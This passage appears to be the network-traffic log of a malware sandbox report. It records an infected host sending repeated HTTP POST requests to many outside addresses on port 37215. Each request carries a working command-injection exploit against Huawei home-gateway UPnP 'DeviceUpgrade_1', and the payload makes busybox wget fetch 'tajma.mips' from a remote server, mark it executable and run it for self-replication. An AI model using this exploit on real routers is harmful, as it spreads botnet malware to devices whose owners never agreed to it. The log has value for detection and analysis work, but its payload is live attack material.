                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3210192.168.2.2333630197.158.85.537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661334991 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3211192.168.2.2333874197.221.198.5037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661344051 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3212192.168.2.2346082197.49.83.3037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661348104 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3213192.168.2.2337718157.111.121.25437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661371946 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3214192.168.2.2354160197.24.246.1737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661511898 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3215192.168.2.2337456102.13.18.11637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661514044 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3216192.168.2.234662041.93.136.17637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661514997 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3217192.168.2.234702441.8.51.19837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661534071 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3218192.168.2.2347376197.49.255.19337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661547899 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3219192.168.2.234315841.64.143.6137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.661550045 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
